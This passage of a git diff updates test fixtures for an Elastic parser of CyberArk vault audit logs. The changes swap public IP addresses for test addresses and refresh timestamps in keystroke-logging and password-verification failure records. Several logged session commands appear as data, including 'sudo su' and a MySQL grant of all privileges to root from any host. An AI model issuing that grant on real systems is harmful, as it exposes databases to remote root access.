Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:18\",\"IsoTimestamp\":\"2021-03-15T14:11:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", @@ -795,39 +685,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -844,7 +713,7 @@ }, "@timestamp": "2021-03-15T14:45:51.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -855,16 +724,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:45:51Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:45:51\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:45:51Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:45:51\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:45:51Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -878,8 +746,8 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;" }, "rfc5424": true, @@ -887,7 +755,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -900,9 +768,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615819476" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 15 07:45:51", "desc": "Keystroke logging" @@ -913,8 +781,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.192011900Z", - "original": "\u003c5\u003e1 2021-03-15T14:45:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:45:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:45:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:45:51\",\"IsoTimestamp\":\"2021-03-15T14:45:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165124200Z", + "original": "\u003c5\u003e1 2021-03-15T14:45:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:45:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:45:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:45:51\",\"IsoTimestamp\":\"2021-03-15T14:45:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log index 211d487b613..29e2a66545c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log @@ -1,8 +1,8 @@ -<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n\n address=34.66.114.180;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n","ExtraDetails":"address=34.66.114.180;username=bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:33:26Z VAULT 